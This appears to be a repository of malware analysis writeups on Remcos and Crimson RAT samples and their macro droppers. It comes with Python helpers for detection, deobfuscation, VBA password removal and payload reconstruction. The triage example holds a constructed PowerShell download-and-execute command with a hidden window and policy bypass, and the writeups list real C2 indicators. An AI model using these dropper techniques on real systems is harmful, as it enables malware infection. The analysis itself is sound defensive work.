├── pic-set2
│   ├── img1.png
│   ├── img2.png
│   ├── img3.png
│   ├── img4.png
│   ├── img5.png
│   ├── img6.png
│   └── img7.png
├── pic-set3
│   ├── img1.png
│   ├── img3.png
│   ├── img4.png
│   ├── img5.png
│   ├── img6.png
│   ├── img7.png
│   ├── img8.png
│   ├── img9.png
│   ├── img10.png
│   ├── img11.png
│   ├── img12.png
│   ├── img13.png
│   └── img14.png
├── pics-set1
│   ├── img1.png
│   ├── img2.png
│   ├── img3.png
│   ├── img4.png
│   ├── img5.png
│   ├── img6.png
│   ├── img7.png
│   └── img8.png
├── README.md
├── RemcosKeylogger.MD
├── RemcosDocDropper.MD
└── CrimsonMacro.md

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Malware Writeups By 1d8

# Sample Resources:

* [Bazaar](https://bazaar.abuse.ch/browse)

# Doc Analyses:

* [Remcos Dropper](https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD)
* [Crimson .Doc Dropper](https://github.com/1d8/analyses/blob/master/CrimsonMacro.md)

# EXE Analysis

* [Remcos Keylogger](https://github.com/1d8/analyses/blob/master/RemcosKeylogger.MD)

--------------------------------------------------------------------------------
/RemcosKeylogger.MD:
--------------------------------------------------------------------------------
# Remcos RAT Keylogger

## Overview

* [Sample here](https://bazaar.abuse.ch/sample/6ad868658b3f50bfde225d52382d33a6027e8344592fb6fa296b8516d9d00f4c/)
* Password to the zip file is **infected**
* First seen: June 10, 2020
* SHA-256 hash: 6ad868658b3f50bfde225d52382d33a6027e8344592fb6fa296b8516d9d00f4c
* File type: exe
* [Strings](https://pastebin.com/raw/vr15q8rZ)

## Analysis

This keylogger doesn't require any special action to trigger it: it runs constantly in the background and logs every event generated by the user.
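Before going through the screenshots, here is how the behaviour this writeup describes (a steady stream of writes to `%APPDATA%\Roaming\remcos\logs.dat`, with the process touching `HKCU\Software\Buddy-6SE1KQ` before it writes) can be picked out of a Procmon CSV export. This is an added example, not code from the original writeup: the CSV rows are constructed to mirror the observations, `sample.exe` and the PIDs are placeholders, and the registry key is matched as a literal indicator for this one sample rather than as a general Remcos rule.

```python
import csv
import io
import re
from collections import defaultdict
from datetime import datetime

# Constructed Procmon CSV export (File > Save, CSV format, default columns).
# The rows imitate the behaviour described in this writeup; they are not a
# capture from the page. "sample.exe" and the PIDs are placeholders.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:15:32.0100000 AM","sample.exe","4120","RegOpenKey","HKCU\Software\Buddy-6SE1KQ","SUCCESS","Desired Access: Read"
"10:15:32.0300000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 0, Length: 52"
"10:15:32.1500000 AM","notepad.exe","5560","WriteFile","C:\Users\user\Documents\notes.txt","SUCCESS","Offset: 0, Length: 12"
"10:15:32.2500000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 52, Length: 31"
"10:15:32.6000000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 83, Length: 18"
"10:15:32.9900000 AM","sample.exe","4120","RegOpenKey","HKCU\Software\Buddy-6SE1KQ","SUCCESS","Desired Access: Read"
"10:15:33.0000000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 101, Length: 40"
"10:15:33.2000000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 141, Length: 9"
"10:15:33.5000000 AM","sample.exe","4120","WriteFile","C:\Users\user\AppData\Roaming\remcos\logs.dat","SUCCESS","Offset: 150, Length: 22"
'''

# Log file location seen in this sample, matched on the path suffix so the
# user name does not matter.
LOG_PATH_RE = re.compile(r"\\AppData\\Roaming\\remcos\\logs\.dat$", re.IGNORECASE)
# Key observed in this sample. The name is sample-specific, so it is used as a
# literal indicator rather than a general rule.
REG_KEY_RE = re.compile(r"^HKCU\\Software\\Buddy-6SE1KQ(\\|$)", re.IGNORECASE)
FILE_WRITE_OPS = {"WriteFile", "CreateFile"}
REG_OPS = {"RegOpenKey", "RegCreateKey", "RegQueryValue", "RegSetValue"}


def parse_tod(text):
    """Parse Procmon's 'Time of Day' (7 fractional digits; strptime takes 6)."""
    hms, rest = text.split(".", 1)
    frac, ampm = rest.split(" ", 1)
    return datetime.strptime(f"{hms}.{frac[:6]} {ampm}", "%I:%M:%S.%f %p")


def detect(csv_text, min_writes=3, min_rate=1.0):
    """Return one finding per process that writes logs.dat at least
    min_writes times and at min_rate writes per second or faster."""
    state = defaultdict(lambda: {"writes": [], "reg_hits": 0, "reg_first": False})
    for row in csv.DictReader(io.StringIO(csv_text)):
        st = state[(row["Process Name"], row["PID"])]
        op, path = row["Operation"], row["Path"]
        if op in REG_OPS and REG_KEY_RE.search(path):
            st["reg_hits"] += 1
        elif op in FILE_WRITE_OPS and LOG_PATH_RE.search(path):
            if not st["writes"] and st["reg_hits"]:
                st["reg_first"] = True  # key touched before the first log write
            st["writes"].append(parse_tod(row["Time of Day"]))

    findings = []
    for (proc, pid), st in state.items():
        n = len(st["writes"])
        if n < min_writes:
            continue
        span = (max(st["writes"]) - min(st["writes"])).total_seconds()
        rate = n / span if span > 0 else float("inf")
        if rate >= min_rate:
            findings.append({
                "process": proc, "pid": pid, "writes": n,
                "writes_per_sec": round(rate, 2),
                "registry_key_touched": st["reg_hits"] > 0,
                "registry_before_first_write": st["reg_first"],
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_CSV):
        print(finding)
```

The rate threshold is what separates this from a legitimate application that writes a log occasionally; the writeup's observation that the file changes more than once a second when the machine is in use is the basis for the default `min_rate`. Raise it, or the write count, if your own Procmon traces show benign software writing the same path.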
After running the .exe we see that it creates a directory named **remcos** under %USERPROFILE%\AppData\Roaming; this is where the logs are stored. *Ignore the name-collision result, it only occurred because I ran the malware twice*:

![](/pic-set2/img1.png)

A new file named **logs.dat** is also created in the remcos directory:

![](/pic-set2/img2.png)

![](/pic-set2/img3.png)

The keylogger itself is quite noisy: it writes to **logs.dat** every time a new event occurs on the system (switching tasks, typing on the keyboard, launching a new process, etc.), which on a machine in use is likely to be more often than once per second:

![](/pic-set2/img4.png)

One thing I found interesting is that the malware interacts with `HKCU\Software\Buddy-6SE1KQ\` before editing the log file:

![](/pic-set2/img5.png)

Here's an example of the activity that is logged:

![](/pic-set2/img6.png)

Searching through the strings extracted from the .exe shows that the capabilities of this keylogger are wider than I originally expected: it also appears to be able to steal browser credentials, record audio from the microphone, and turn the webcam on and off:

![](/pic-set2/img7.png)

--------------------------------------------------------------------------------
/RemcosDocDropper.MD:
--------------------------------------------------------------------------------
# Remcos RAT Macro Dropper Doc

## Overview

* [Sample & more info](https://bazaar.abuse.ch/sample/202d979d74f0478de0fbea103e2585a84fdab5646ad19437f5e4c4ba0cda7b90/)
* Password to the zip file is **infected**
* First seen: May 27, 2020
* URL no longer up
* File type: docm
* SHA-256 hash: 202d979d74f0478de0fbea103e2585a84fdab5646ad19437f5e4c4ba0cda7b90
* URL used was hxxp://185.205.209.166/dkkp/qlyzbsuu.a12.exe, shortened via tinyurl
* [Macros used](https://pastebin.com/raw/T9YNjDpD)

## Analysis

Once opened, the document looks like this:

![](/pics-set1/img8.png)

In my opinion, not much work was put into crafting the actual document, but who am I to judge?

When you enable content, you get this error message:

![](/pics-set1/img1.png)

This isn't a fake error message crafted by the attacker as a social-engineering tactic (as I did [here ;)](https://github.com/1d8/pysock)) but a genuine one: the file the macro attempts to download and execute (saved as **Filename.exe**) never actually downloads.

After enabling content and letting the macros run, Procmon's process tree shows that PowerShell is used to *attempt* to drop the main malware (ignore the notepad.exe noise, which I generated myself):

![](/pics-set1/img2.png)

The full PowerShell command used by the macro is here:

![](/pics-set1/img3.png)

As we can see, it runs PowerShell in a hidden window and passes `-ExecutionPolicy Bypass` so that the machine's script execution policy does not get in the way. Note that the execution policy is not a security boundary: `Bypass` works for a standard user and does not require admin rights, and the policy only governs the loading of script files and profiles in the first place, not commands supplied on the command line. The one case where the switch has no effect is a policy enforced through Group Policy, which takes precedence over the command-line value.

The PowerShell also downloads the file to disk, saves it in the Temp directory as **Filename.exe** as we saw earlier, and then executes it.

The URL used is hxxps://tinyurl.com/ybz4nnyg. TinyURL is a URL shortener that redirects to the real site. Attempting to navigate to this tinyurl yields no response, which likely means the site that hosted the malware has since been taken down.
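As an added example (not the macro's own code, nor anything from the original writeup), the following Python peels the two base64 layers the macro wraps around its command, the way the `sadsad()` function in the macro does, and then triages the resulting PowerShell command line for the traits noted above. The command string is a constructed stand-in that reproduces the behaviours described here (hidden window, `Bypass`, download to `%TEMP%\Filename.exe` via the tinyurl, then execute); it is not the sample's actual command, and the `-EncodedCommand` (UTF-16LE) inner layer is an assumption added to show how that case is handled.

```python
import base64
import binascii
import re

# Constructed stand-in for the command the macro hands to Shell(). It
# reproduces the behaviours described in this writeup (hidden window, Bypass
# policy, download to %TEMP%\Filename.exe, then run it) but is NOT the
# sample's real string. The URL is defanged (hxxps) and is never fetched.
SCRIPT = ("$u='hxxps://tinyurl.com/ybz4nnyg';$p=\"$env:TEMP\\Filename.exe\";"
          "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p")
# Assumption: the inner script is passed with -EncodedCommand, which takes the
# base64 of UTF-16LE text. Included to show that case; not confirmed for the sample.
INNER = "powershell.exe -w hidden -ep bypass -enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
# The macro stores the command base64-encoded twice: one decode yields the
# string held in asdas, sadsad() performs the second.
VBA_BLOB = base64.b64encode(base64.b64encode(INNER.encode())).decode()

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def _as_text(raw):
    """Bytes -> str if they look like text (UTF-16LE or printable ASCII), else None."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")  # every second byte NUL: UTF-16LE ASCII
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def peel_base64(data, max_layers=4):
    """Decode nested base64 layers until the result stops being base64.
    Returns (innermost_text, layers_removed)."""
    text, layers = data, 0
    while layers < max_layers:
        compact = re.sub(r"\s+", "", text)
        if not compact or len(compact) % 4 or not B64_RE.fullmatch(compact):
            break
        try:
            decoded = _as_text(base64.b64decode(compact, validate=True))
        except binascii.Error:
            break
        if decoded is None:  # binary output: stop, this was the last layer
            break
        text, layers = decoded, layers + 1
    return text, layers


def triage(command):
    """Pull the traits discussed above out of a PowerShell command line."""
    enc = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command, re.I)
    script = _as_text(base64.b64decode(enc.group(1))) if enc else command
    url_re = r"h(?:tt|xx)ps?://[^\s'\"()]+"  # accepts defanged hxxp(s) too
    return {
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", command, re.I)),
        "policy_bypass": bool(re.search(r"-e(?:x|xec|xecutionpolicy|p)\s+bypass\b", command, re.I)),
        "encoded_command": enc is not None,
        "script": script,
        "urls": list(dict.fromkeys(re.findall(url_re, script, re.I))),
        "executables": list(dict.fromkeys(re.findall(r"[\w$:\\]+\.exe", script, re.I))),
    }


if __name__ == "__main__":
    command, layers = peel_base64(VBA_BLOB)
    print(f"{layers} base64 layer(s) removed")
    print(triage(command))
```

Feed `peel_base64()` the string literal the macro passes to `sadsad()` (copied out of the VBA source, or taken from the message box produced by the edit described below) and it stops by itself once the output is no longer valid base64, so it does not matter whether a given sample uses one, two or three layers.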
The final payload that would have been fetched, had the URL still been up, is the Remcos RAT.

My claim that the URL is no longer up is backed by the PowerShell logs:

![](/pics-set1/img4.png)

If you wish to retrieve the PowerShell command without running it the way the attackers intended, simply edit the macro: delete the Shell() call, assign its argument to a variable, and print that variable in a message box:

Before:

![](/pics-set1/img5.png)

After:

![](/pics-set1/img6.png)

Result after running:

![](/pics-set1/img7.png)

*NOTE: The reason Shell is called on a function applied to a variable is that the command passed to Shell is base64-encoded twice and needs to be decoded twice before it is run. The variable **asdas** contains the command after one decode, and the call Shell(sadsad(asdas, True)) is where the second decode happens; the function **sadsad()** is responsible for the base64 decoding. I hope this makes sense. Thanks for reading!*

--------------------------------------------------------------------------------
/CrimsonMacro.md:
--------------------------------------------------------------------------------
# Crimson RAT Sample

[Download sample](https://app.any.run/tasks/206fb61a-38ac-4f84-81f6-9389ce775c16/)

# Document Password Removal

The document's macros are password protected, but bypassing this is quite easy. The method I used was posted on [Stackoverflow](https://stackoverflow.com/questions/272503/removing-the-password-from-a-vba-project).

Open the document in a hex editor (or any editor that will not alter the other bytes of a binary file), search for the string 'DPB' and replace it with 'DPx'. If the sample is a .docm rather than a binary .doc, the VBA project lives in word/vbaProject.bin inside the zip container, so extract that file, patch it, and put it back.

![](/pic-set3/img1.png)

After replacing the string, open the document and go to the macros tab (Developer > Visual Basic). You will likely get this popup:

![](/pic-set3/img3.png)

After clicking Yes, you may get this error popup as well; simply ignore it.

![](/pic-set3/img4.png)

Once in the Visual Basic window, go to Tools > Project Properties > Protection, set a new password, then exit the document and save the changes.

Now when you go into Developer > Visual Basic and look at the macros, you should be able to view them by entering the new password.

# Macro Analysis

The first subroutine (named **Con**) sets a Path variable to `C:\Users\Username\Intel.exe`, which tells us that this macro will likely drop a PE file named **Intel.exe**:

![](/pic-set3/img5.png)

The **Con** subroutine also splits the data in **UserForm1** on the exclamation-point character, which tells us that there is data stored in the **UserForm1** form.

Viewing that form, we don't see anything at first glance:

![](/pic-set3/img6.png)

But expanding the form reveals a small box, and expanding that shows the data:

![](/pic-set3/img7.png)

![](/pic-set3/img8.png)

So the **Con** subroutine splits this data on exclamation points, which simply strips the exclamation points and keeps the numbers between them:

![](/pic-set3/img5.png)

I am not too sure of the exact process it goes through to turn the numbers into bytes, but this is my best interpretation:

1. It removes the exclamation points from the data and turns it into an array
2. It loops through each element of the array
3. It turns each array element (each group of digits) into a Byte

Moving on to the next subroutine:

![](/pic-set3/img9.png)

This one is pretty simple: it stores `C:\Users\Username\Intel.exe` (where Username is the victim's username) in the Path1 string, opens that file, and writes the bytes produced by the previous subroutine to **Intel.exe**.

And on to the last subroutine:

![](/pic-set3/img10.png)

As you could have guessed from the name, this subroutine simply runs **Intel.exe** with a window style of 1 (vbNormalFocus), which means the window would be visible to the victim.

Testing our theory that the window should be seen by the victim:

![](/pic-set3/img13.png)

# Running the Macros

After running the macros I didn't see the window pop up; I assume **Intel.exe** contains code that hides its own window.

But we can see that it is indeed run:

![](/pic-set3/img11.png)

**Intel.exe** reaches out to **51.89.208.53:350** and also tries to reach the same host on port 8730:

![](/pic-set3/img12.png)

Attempting to view the communication in Wireshark didn't yield much:

![](/pic-set3/img14.png)

# Links Used

1. [Converting ASCII to hex](https://www.asciitohex.com/)

2. [VBA Functions List](https://www.excelfunctions.net/vba-functions.html)

3. [MSDN Shell()](https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/shell-function)

--------------------------------------------------------------------------------
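The DPB-to-DPx edit from the Document Password Removal section, scripted so it can be applied to a batch of samples. This is an added example, not code from the original writeup or from the Stack Overflow answer it cites; it handles both a binary Office file (an OLE compound file, patched in place) and an OOXML container such as .docm, where the VBA project sits in word/vbaProject.bin inside the zip. The sample .docm and OLE bytes it runs on are constructed: a real vbaProject.bin is itself an OLE file whose PROJECT stream carries the `DPB=` line, and only that line matters for the patch.

```python
import io
import zipfile

# Header of an OLE compound file (.doc/.xls, and vbaProject.bin itself)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def patch_dpb(blob):
    """Rename the DPB= record of the VBA PROJECT stream to DPx= so the VBA
    editor treats the stored password as invalid and lets you set a new one.
    Returns (patched_bytes, replacements). Caveat: this is a plain byte search,
    the same as doing it in a hex editor; it misses a 'DPB=' that straddles
    two OLE sectors, which is rare for a 4-byte string."""
    return blob.replace(b"DPB=", b"DPx="), blob.count(b"DPB=")


def read_zip_entry(doc_bytes, name):
    """Read one entry of an OOXML container held in memory."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        return z.read(name)


def unlock_vba_project(doc_bytes):
    """Apply patch_dpb to a binary Office file (OLE) directly, or to the
    vbaProject.bin inside a .docm/.xlsm/.pptm (a zip container)."""
    if doc_bytes.startswith(OLE_MAGIC):
        return patch_dpb(doc_bytes)
    if doc_bytes[:2] != b"PK":
        raise ValueError("not an OLE compound file or an OOXML zip container")
    out, total = io.BytesIO(), 0
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info)
            if info.filename.lower().endswith("vbaproject.bin"):
                data, n = patch_dpb(data)
                total += n
            dst.writestr(info, data)  # keeps the original entry metadata
    return out.getvalue(), total


def build_sample_docm():
    """Constructed stand-in for a macro-enabled document. A real
    vbaProject.bin is an OLE file whose PROJECT stream holds the DPB= line;
    only that text matters for the patch, so it is written out directly."""
    fake_vba = (b'ID="{00000000-0000-0000-0000-000000000000}"\r\n'
                b'Document=ThisDocument/&H00000000\r\n'
                b'DPB="0102030405060708"\r\nGC="AABBCC"\r\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", fake_vba)
    return buf.getvalue()


# Constructed stand-in for a binary .doc: OLE header followed by the line
SAMPLE_OLE = OLE_MAGIC + b"\x00" * 16 + b'DPB="AABB"\x00\x00'

if __name__ == "__main__":
    patched, n = unlock_vba_project(build_sample_docm())
    print(n, "replacement(s);", read_zip_entry(patched, "word/vbaProject.bin"))
```

After writing the returned bytes to a new file, the rest of the procedure is unchanged: open it, click through the two dialogs, set a new password under Tools > Project Properties > Protection, and save. Keep the original sample untouched and work on the copy, since the patch changes the file's hash.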
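The byte reconstruction that the **Con** subroutine performs in the Macro Analysis section, as an added example rather than code from the macro or the original writeup. It goes a little beyond the text: instead of writing the result to Intel.exe the way the macro does, it keeps the bytes in memory and checks the DOS and PE headers, which is the safe way to confirm that the UserForm1 data really is a PE file before handing it to a sandbox. The form text it runs on is constructed from a minimal hand-built PE header, not the sample's real data.

```python
import hashlib
import struct


def rebuild_payload(form_text, sep="!"):
    """Turn the '!'-separated decimal list stored in UserForm1 back into the
    bytes the Con subroutine assembles and the next subroutine writes to
    Intel.exe. Each field must fit a VBA Byte (0..255), as CByte would require."""
    values = []
    for field in form_text.split(sep):
        field = field.strip()
        if not field:  # tolerate leading, trailing or doubled separators
            continue
        v = int(field)
        if not 0 <= v <= 255:
            raise ValueError(f"{v} does not fit in a Byte")
        values.append(v)
    return bytes(values)


def pe_summary(data):
    """Sanity-check the rebuilt blob as a PE image without writing it to disk."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 8 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False}
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    return {
        "is_pe": True,
        "size": len(data),
        "machine": hex(machine),  # 0x14c = x86, 0x8664 = x64
        "sections": nsections,
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def _sample_blob():
    """Constructed stand-in for the dropped file: a DOS header with
    e_lfanew = 0x40, a PE signature and an x86 COFF header with 3 sections."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x102)
    return bytes(dos) + b"PE\0\0" + coff


# What the UserForm1 text box would contain for the blob above
SAMPLE_FORM_TEXT = "!".join(str(b) for b in _sample_blob())

if __name__ == "__main__":
    payload = rebuild_payload(SAMPLE_FORM_TEXT)
    print(pe_summary(payload))
```

Paste the real form contents into `rebuild_payload()` to get the dropped file's SHA-256 directly from the document, which can be matched against Bazaar or any.run without ever letting the macro write Intel.exe to disk.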